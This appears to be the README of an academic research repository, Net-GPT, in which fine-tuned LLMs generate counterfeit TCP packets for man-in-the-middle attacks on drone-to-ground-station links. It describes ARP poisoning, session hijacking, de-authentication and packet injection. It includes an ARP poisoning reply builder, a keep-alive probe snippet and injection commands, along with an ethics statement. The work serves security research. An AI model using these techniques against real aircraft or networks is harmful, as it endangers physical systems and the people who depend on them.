Brett Piggott1 ·
Siddhant Patil2 ·
Guohuan Feng1 ·
Ibrahim Odat1 ·
Rajdeep Mukherjee1 ·
Balakrishnan Dharmalingam1 ·
Anyi Liu1
1Oakland University 2University of Wisconsin–Madison
Overview · Key Results · Architecture · Quick Start · Attacks · Fine-Tuning · Structure · Citation
- [Dec 2023] 🏆 Paper presented at IEEE/ACM SEC 2023 — Symposium on Edge Computing, Wilmington, DE
- [Nov 2023] 📄 Paper accepted at SEC'23 — Full research paper · DOI: 10.1145/3583740.3626809
- [2023] 🔬 Research artifact and codebase publicly released
"The convergence of Large Language Models with security systems transforms cybersecurity in the AI landscape."
Net-GPT is a research framework demonstrating a novel class of LLM-empowered offensive cyber-physical attacks against Unmanned Aerial Vehicle (UAV) communication systems. The system shows how fine-tuned Large Language Models can be weaponized to:
- 🎯 Understand network protocols — LLMs learn TCP session structure through QLoRA fine-tuning on real packet captures
- 🔀 Launch Man-in-the-Middle attacks — Adversarial UAVs intercept and impersonate benign UAV↔GCS communication
- 📡 Generate mimicked network packets — Context-aligned counterfeit TCP packets generated in real-time via an edge server
- ⚡ Enable edge-computing deployment — Smaller LLMs (Distil-GPT-2) achieve 47× faster response time while retaining ~78% prediction capability
The adversary operates a malicious UAV that joins the same network as a benign UAV and its Ground Control Station (GCS). The malicious UAV leverages a nearby edge server equipped with fine-tuned LLMs to:
- Hijack the benign UAV via ARP poisoning, session hijacking, or de-authentication attacks
- Impersonate both endpoints by generating realistic TCP packets using LLM inference
- Maintain persistent session control using signaling packets (delayed ACK, DupACK, Keep-Alives)
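The signaling packets above follow standard TCP conventions. A minimal sketch of how a keep-alive probe can be derived from the last observed segment (plain Python with hypothetical field dicts, not the repository's API; the "sequence number minus one, zero payload" convention is the usual keep-alive trick):

```python
def keepalive_probe(last_seg: dict) -> dict:
    """Derive a TCP keep-alive probe from the last segment we sent.

    Convention: a keep-alive carries no payload and a sequence number
    one below send-next, so the peer answers with a duplicate ACK
    without advancing the stream -- keeping the session alive.
    """
    snd_nxt = last_seg["Seq"] + last_seg["Length"]
    return {
        "Src_IP": last_seg["Src_IP"],
        "Dst_IP": last_seg["Dst_IP"],
        "Flag": "ACK",
        "Seq": snd_nxt - 1,   # one byte "behind" to elicit a DupACK
        "Ack": last_seg["Ack"],
        "Length": 0,          # empty probe
    }
```

Emitting such probes lets the malicious UAV hold the hijacked session open indefinitely without injecting new data.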
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ Benign UAV │◄───────►│ Malicious UAV│◄───────►│ GCS │
│ (Target) │ MITM │ (Attacker) │ MITM │ (Victim) │
└──────────────┘ └──────┬───────┘ └──────────────┘
│
┌──────▼───────┐
│ Edge Server │
│ (RTX 4090) │
│ Fine-tuned │
│ LLM Engine │
└──────────────┘
| Model | Parameters | Overall Accuracy | Response Time |
|---|---|---|---|
| Llama-2-13B | 13B | 95.3% | 108.3 s |
| Llama-2-7B | 7B | 94.1% | — |
| GPT-2 | 137M | 74.2% (relative to Llama-2-13B) | 5.18 s (21× faster) |
| Distil-GPT-2 | 82M | 77.9% (relative to Llama-2-7B) | 2.31 s (47× faster) |
| Field | Src IP | Dst IP | Src Port | Dst Port | Flags | Seq# | Ack# | Length |
|---|---|---|---|---|---|---|---|---|
| Accuracy | 98.9% | 98.9% | 98.9% | 98.9% | 83.4% | 96.2% | 91.0% | 99.0% |
| Error Count | 0 errors | 1 error | 2 errors | 3–5 errors | 6+ errors |
|---|---|---|---|---|---|
| Rate | 76.2% | 20.3% | 1.9% | 0% | 1.6% |
Over 76% of generated packets are error-free, and 96.5% contain at most one erroneous field; a single bad field is easily corrected by the adversary.
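Single-field errors can often be repaired with TCP arithmetic alone. A minimal sketch (a hypothetical helper, not taken from the repository) that re-derives a predicted Ack# from the preceding packet:

```python
def repair_ack(prev: dict, pred: dict) -> dict:
    """Overwrite a predicted Ack# that violates TCP arithmetic.

    For a reply segment, the acknowledgement number should equal the
    previous segment's sequence number plus its payload length.
    Fields are strings, matching the training-entry template.
    """
    expected_ack = int(prev["Seq"]) + int(prev["Length"])
    if int(pred["Ack"]) != expected_ack:
        pred = {**pred, "Ack": str(expected_ack)}  # fix the single bad field
    return pred
```

The same check doubles as a validator: a packet whose Ack# already satisfies the arithmetic passes through unchanged.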
| Combination | Dataset | Epochs | Accuracy (13B) | Accuracy (7B) |
|---|---|---|---|---|
| Best | 100K | 2 | 96.5% | 97.0% |
| Medium | 60K | 3 | 96.0% | 96.2% |
| Low | 20K | 10 | 93.5% | 92.8% |
Larger datasets with fewer epochs consistently outperform smaller datasets with more epochs — a key insight for edge-computing deployment strategies.
Net-GPT operates as a two-phase attack pipeline: offline fine-tuning on captured traffic, followed by real-time inference at the edge (see the pipeline diagrams below).
Six attack methods targeting the PX4 autopilot communication layer:
| Attack | Method | MITM | Unauthorized Access | Denial of Service |
|---|---|---|---|---|
| MAC Spoofing | Layer 2 impersonation | ✅ | ✅ | ❌ |
| Session Hijacking | TCP session takeover | ✅ | ✅ | ❌ |
| ARP Poisoning | ARP cache corruption | ✅ | ✅ | ❌ |
| Packet Injection | Crafted packet insertion | ✅ | ✅ | ❌ |
| Flooding Attack | Resource exhaustion | ❌ | ❌ | ✅ |
| De-authentication | WiFi disassociation | ❌ | ✅ | ✅ |
┌─────────────────────────────────────────────────────────────────────┐
│ FINE-TUNING PIPELINE │
│ │
│ Raw PCAP ──► tshark extract ──► JSON format ──► QLoRA tune │
│ (bigFlows) (TCP sessions) (#Previous, (NF4 quant, │
│ 368 MB 6,971 sessions #Predicted, 8 batch, │
│ 791K packets 100K packets #Context) 2e-4 LR) │
└─────────────────────────────────────────────────────────────────────┘
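The tshark → JSON step pairs each packet with its successor to form training entries. A minimal sketch of that conversion (plain Python; the tab-separated field order is an assumption about how tshark was invoked, not the repository's exact format):

```python
import json

# Field order assumed for a tshark invocation like:
#   tshark -r in.pcap -T fields -e ip.src -e ip.dst ... (illustrative)
FIELDS = ["Src_IP", "Dst_IP", "Src_Port", "Dst_Port",
          "Flag", "Seq", "Ack", "Length"]

def parse_line(tsv_line: str) -> dict:
    """Map one tab-separated tshark record onto the template's field names."""
    return dict(zip(FIELDS, tsv_line.rstrip("\n").split("\t")))

def make_entry(prev_line: str, next_line: str, session_id: int) -> str:
    """Pair two consecutive packets of a session into one training example."""
    entry = {
        "#Previous_Packet": parse_line(prev_line),
        "#Predicted_Packet": parse_line(next_line),
        "#Context": f"TCP_SESSION_ID:{session_id}",
    }
    return json.dumps(entry)
```

Sliding this pairing over every session yields the 100K-packet JSON dataset consumed by the QLoRA trainer.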
┌─────────────────────────────────────────────────────────────────────┐
│ INFERENCE PIPELINE │
│ │
│ Intercepted ──► Edge Server ──► Fine-tuned ──► Scapy craft │
│ TCP packet (RTX 4090) LLM predict Inject on │
│ from session Format query next packet network │
└─────────────────────────────────────────────────────────────────────┘
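One inference step of the pipeline above — format a query from the intercepted packet, ask the model, parse its reply — can be sketched as follows (the `llm` callable stands in for the fine-tuned model endpoint; this is an illustrative shape, not the repository's `predict.py`):

```python
import json

def format_query(intercepted: dict, session_id: int) -> str:
    """Render an intercepted packet as a '#Previous_Packet' prompt."""
    return json.dumps({
        "#Previous_Packet": intercepted,
        "#Context": f"TCP_SESSION_ID:{session_id}",
    })

def next_packet(intercepted: dict, session_id: int, llm) -> dict:
    """One inference step: prompt the LLM, parse its JSON reply.

    `llm` is any callable str -> str: a fine-tuned model on the edge
    server in the real pipeline, a stub in tests. The parsed
    '#Predicted_Packet' dict is then handed to the Scapy crafter.
    """
    reply = llm(format_query(intercepted, session_id))
    return json.loads(reply)["#Predicted_Packet"]
```

Keeping the prompt and reply in the same three-section JSON template as the training data is what lets the model's output be parsed deterministically.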
Each training entry follows a structured three-section template:
{
"#Previous_Packet": {
"Src_IP": "192.168.1.10",
"Dst_IP": "192.168.1.20",
"Src_Port": "54321",
"Dst_Port": "80",
"Flag": "ACK",
"Seq": "1001",
"Ack": "2001",
"Length": "512"
},
"#Predicted_Packet": {
"Src_IP": "192.168.1.20",
"Dst_IP": "192.168.1.10",
"Src_Port": "80",
"Dst_Port": "54321",
"Flag": "ACK PSH",
"Seq": "2001",
"Ack": "1513",
"Length": "1024"
},
"#Context": "TCP_SESSION_ID:7042"
}

| Dependency | Version | Purpose |
|---|---|---|
| Python | ≥ 3.10 | Runtime |
| PyTorch | ≥ 2.0 | Model training & inference |
| Transformers | ≥ 4.31 | Hugging Face model loading |
| PEFT | ≥ 0.4 | QLoRA fine-tuning |
| bitsandbytes | ≥ 0.40 | NF4 quantization |
| Scapy | ≥ 2.5 | Network packet crafting |
| tshark | ≥ 3.0 | PCAP parsing |
| CUDA | ≥ 11.8 | GPU acceleration |
git clone https://github.com/OdatSec/Net-GPT.git
cd Net-GPT
pip install -r requirements.txt

# Download and extract TCP sessions from PCAP
python src/data_preprocessing/pcap_extractor.py \
--input data/raw/bigFlows.pcap \
--output data/processed/train.json \
--max-packets 100000
python src/data_preprocessing/pcap_extractor.py \
--input data/raw/smallFlows.pcap \
--output data/processed/test.json

# Fine-tune Llama-2-13B with QLoRA (default config)
python src/fine_tuning/qlora_trainer.py \
--model meta-llama/Llama-2-13b-hf \
--dataset data/processed/train.json \
--epochs 1 \
--output models/llama2-13b-netgpt
# Fine-tune Distil-GPT-2 (edge deployment)
python src/fine_tuning/qlora_trainer.py \
--model distilgpt2 \
--dataset data/processed/train.json \
--epochs 1 \
--output models/distilgpt2-netgpt

# Generate predicted packets from intercepted sessions
python src/inference/predict.py \
--model models/llama2-13b-netgpt \
--input data/processed/test.json \
--output results/predictions_llama2_13b.json

# Per-field accuracy evaluation
python src/inference/evaluate.py \
--predictions results/predictions_llama2_13b.json \
--ground-truth data/processed/test.json \
--output results/evaluation_llama2_13b.json

# Generate Scapy-compatible packets from predictions
python src/packet_crafting/craft_packets.py \
--predictions results/predictions_llama2_13b.json \
--interface eth0

| Parameter | Value | Parameter | Value |
|---|---|---|---|
| NF4 Quantization | nf4 | Logging steps | 10 |
| Batch size/device | 8 | Learning rate | 2e-4 |
| Gradient steps | 12 | Global grad norm | 0.3 |
| Paged Optimizer | paged_adamw_32bit | Warm-up ratio | 0.03 |
| Scheduler | constant | Epochs | 1–10 |
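These settings map onto standard Hugging Face QLoRA configuration roughly as follows. This is a sketch under two assumptions: that "Gradient steps" means gradient-accumulation steps, and that the LoRA rank/alpha values (not stated in the table) are illustrative placeholders:

```python
import torch
from transformers import BitsAndBytesConfig, TrainingArguments
from peft import LoraConfig

bnb_config = BitsAndBytesConfig(      # NF4 quantization row
    load_in_4bit=True,
    bnb_4bit_quant_type="nf4",
    bnb_4bit_compute_dtype=torch.bfloat16,
)

lora_config = LoraConfig(             # adapter shape: illustrative values
    r=64, lora_alpha=16, lora_dropout=0.1, task_type="CAUSAL_LM",
)

training_args = TrainingArguments(
    output_dir="models/llama2-13b-netgpt",
    per_device_train_batch_size=8,     # Batch size/device
    gradient_accumulation_steps=12,    # "Gradient steps" (assumed meaning)
    learning_rate=2e-4,                # Learning rate
    max_grad_norm=0.3,                 # Global grad norm
    warmup_ratio=0.03,                 # Warm-up ratio
    lr_scheduler_type="constant",      # Scheduler
    logging_steps=10,                  # Logging steps
    optim="paged_adamw_32bit",         # Paged Optimizer
    num_train_epochs=2,                # sweep ran 1-10; 2 was best
)
```

The paged 32-bit AdamW optimizer and NF4 quantization are what make 13B-parameter fine-tuning fit on a single RTX 4090.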
| Model | Parameters | HuggingFace ID | Use Case |
|---|---|---|---|
| Llama-2-13B | 13B | meta-llama/Llama-2-13b-hf | High-accuracy server deployment |
| Llama-2-7B | 7B | meta-llama/Llama-2-7b-hf | Balanced accuracy/speed |
| GPT-2 | 137M | gpt2 | Compact edge deployment |
| Distil-GPT-2 | 82M | distilgpt2 | Ultra-fast edge deployment |
| Property | Fine-Tuning (bigFlows) | Testing (smallFlows) |
|---|---|---|
| Size | 368 MB | 9.4 MB |
| Packets | 791,615 | 14,261 |
| Flows | 40,686 | 1,209 |
| Applications | 132 | 28 |
| Avg. Packet Size | 449 bytes | 646 bytes |
| Duration | 5 minutes | 5 minutes |
ARP Poisoning — Layer 2 cache corruption
Corrupts ARP tables on both the target UAV and GCS, redirecting traffic through the malicious UAV. The attacker becomes an invisible relay, enabling full packet interception and modification.
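For reference, the 28-byte ARP reply payload at the heart of cache poisoning has a fixed layout. A standalone sketch of its construction with `struct` (illustrative only; the repository's `src/attacks/arp_poisoning.py` is the authoritative implementation):

```python
import socket
import struct

def arp_reply(spoofed_ip: str, attacker_mac: bytes,
              target_ip: str, target_mac: bytes) -> bytes:
    """Build the 28-byte ARP reply payload used to poison a cache.

    Claims `spoofed_ip` resides at `attacker_mac`; a target that
    accepts the unsolicited reply rewrites its ARP table entry and
    starts routing traffic for `spoofed_ip` through the attacker.
    """
    return struct.pack(
        "!HHBBH6s4s6s4s",
        1,                    # htype: Ethernet
        0x0800,               # ptype: IPv4
        6, 4,                 # hlen, plen
        2,                    # oper: 2 = reply
        attacker_mac, socket.inet_aton(spoofed_ip),
        target_mac, socket.inet_aton(target_ip),
    )
```

Sending one such frame to the UAV (spoofing the GCS's IP) and one to the GCS (spoofing the UAV's IP) places the attacker in the relay position shown in the architecture diagram.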
Session Hijacking — TCP session takeover
Exploits the TCP three-way handshake to inject the attacker into an established session. Semi-session and full-session variants allow partial or complete control of the communication channel.
De-authentication — WiFi disassociation attack
Forces the benign GCS to disconnect from the network by sending spoofed de-authentication frames. The malicious UAV then establishes itself as the communication partner.
Packet Injection — Crafted packet insertion
After establishing MITM position, the adversary uses the fine-tuned LLM to generate and inject context-aligned TCP packets that mimic legitimate UAV↔GCS communication patterns.
Net-GPT/
│
├── 📂 src/ Source code package
│ ├── data_preprocessing/
│ │ ├── pcap_extractor.py Extract TCP sessions from PCAP files
│ │ ├── session_parser.py Parse and structure TCP sessions
│ │ └── json_formatter.py Format data for fine-tuning
│ │
│ ├── fine_tuning/
│ │ ├── qlora_trainer.py QLoRA fine-tuning pipeline
│ │ ├── dataset_loader.py Custom dataset for packet prediction
│ │ └── train_config.py Training hyperparameter configs
│ │
│ ├── inference/
│ │ ├── predict.py Generate packet predictions
│ │ ├── evaluate.py Per-field accuracy evaluation
│ │ └── benchmark.py Response time benchmarking
│ │
│ ├── attacks/
│ │ ├── arp_poisoning.py ARP cache poisoning implementation
│ │ ├── session_hijack.py TCP session hijacking
│ │ ├── deauth_attack.py WiFi de-authentication
│ │ └── mitm_controller.py MITM orchestration engine
│ │
│ └── packet_crafting/
│ ├── craft_packets.py Scapy-based packet construction
│ └── session_replayer.py TCP session replay engine
│
├── 📂 configs/
│ ├── qlora_llama2_13b.yaml Llama-2-13B fine-tuning config
│ ├── qlora_llama2_7b.yaml Llama-2-7B fine-tuning config
│ ├── qlora_gpt2.yaml GPT-2 fine-tuning config
│ └── qlora_distilgpt2.yaml Distil-GPT-2 fine-tuning config
│
├── 📂 data/
│ ├── raw/ Raw PCAP captures (user-supplied)
│ └── processed/ Processed JSON for training/testing
│
├── 📂 models/ Fine-tuned model checkpoints
│
├── 📂 results/ Experiment outputs and evaluations
│
├── 📂 figures/ Paper figures and visualizations
│
├── 📂 docs/
│ ├── METHODOLOGY.md Detailed methodology documentation
│ ├── RESULTS.md Comprehensive results tables
│ └── EDGE_DEPLOYMENT.md Edge computing deployment guide
│
├── 📂 scripts/
│ ├── run_all_experiments.sh Reproduce all paper results
│ ├── evaluate_all_models.sh Batch evaluation script
│ └── download_dataset.sh Dataset download helper
│
├── .gitignore Git ignore rules
├── CITATION.cff Machine-readable citation metadata
├── CONTRIBUTING.md Contribution guidelines
├── LICENSE MIT License
├── README.md This file
├── SECURITY.md Security policy & responsible use
└── requirements.txt Python dependencies
The paper systematically investigates three research questions:
Finding: Llama-2-13B (95.3%) marginally outperforms Llama-2-7B (94.1%). The 1.2-percentage-point gap is surprisingly small given the roughly 2× parameter difference, suggesting that model architecture matters more than raw parameter count for protocol-understanding tasks.
Finding: 100K packets with 2 epochs produces the best accuracy for both models. Larger datasets markedly improve Flags-field prediction — critical for sustaining communication sessions. Additional epochs do not help smaller LLMs and may even degrade performance.
Finding: Distil-GPT-2 (82M params) achieves 77.9% of Llama-2-7B's capability while responding 47× faster than Llama-2-13B (2.31 s vs. 108.3 s). This enables real-time edge deployment on resource-constrained mobile platforms — crucial for adversarial field operations.
All experiments are fully reproducible:
# Reproduce all paper results end-to-end
bash scripts/run_all_experiments.sh
# Reproduce specific model evaluation
python src/inference/evaluate.py \
--model-name llama2-13b \
--dataset-sizes 20000 40000 60000 80000 100000 \
--epochs 1

| Artifact | Path | Description |
|---|---|---|
| Training data | data/processed/train.json | 100K packets from bigFlows |
| Test data | data/processed/test.json | 14,261 packets from smallFlows |
| Model configs | configs/*.yaml | QLoRA hyperparameters per model |
| Results | results/ | Per-field accuracy JSON per experiment |
All experiments were conducted in an isolated laboratory environment with UAVs operating under the PX4 autopilot simulation framework. No real airspace, operational networks, production UAV systems, or public wireless infrastructure was involved at any stage of this research.
The attack implementations in this repository are disclosed as part of responsible academic vulnerability research demonstrating how adversarial LLM capabilities extend to network-level physical systems. The intent is to motivate the design of LLM-aware network security defenses for UAV communication infrastructure.
⛔ Do not deploy any attack component against real aircraft, live airspace, operational networks, or systems you do not own and have explicit authorization to test.
This research was reviewed and approved by the institutional review process at Oakland University.
See SECURITY.md for the full security policy.
If Net-GPT contributes to your research, please cite:
@inproceedings{piggott2023netgpt,
title = {{Net-GPT}: A {LLM}-Empowered Man-in-the-Middle Chatbot for
Unmanned Aerial Vehicle},
author = {Piggott, Brett and Patil, Siddhant and Feng, Guohuan and
Odat, Ibrahim and Mukherjee, Rajdeep and
Dharmalingam, Balakrishnan and Liu, Anyi},
booktitle = {Proceedings of the 2023 IEEE/ACM Symposium on Edge Computing (SEC)},
year = {2023},
pages = {287--293},
publisher = {ACM},
address = {Wilmington, DE, USA},
doi = {10.1145/3583740.3626809},
isbn = {979-8-4007-0123-8}
}

A CITATION.cff file is included for GitHub's automatic citation tool.
| Project | Venue | Relationship |
|---|---|---|
| AeroMind | RAID 2026 | Memory-poisoning attacks on LLM-driven UAV agents (follow-up work) |
| Heterogeneous Generative Dataset for UASes | IEEE MOST 2023 | Foundational UAV dataset work |
| Author | Affiliation | Role |
|---|---|---|
| Brett Piggott | Oakland University | Lead developer |
| Siddhant Patil | University of Wisconsin–Madison | Contributor |
| Guohuan Feng | Oakland University | Contributor |
| Ibrahim Odat | Oakland University | Contributor |
| Rajdeep Mukherjee | Oakland University | Contributor |
| Balakrishnan Dharmalingam | Oakland University | Contributor |
| Anyi Liu | Oakland University | Principal Investigator |
Net-GPT · IEEE/ACM SEC 2023 · Oakland University · University of Wisconsin–Madison
Released under the MIT License
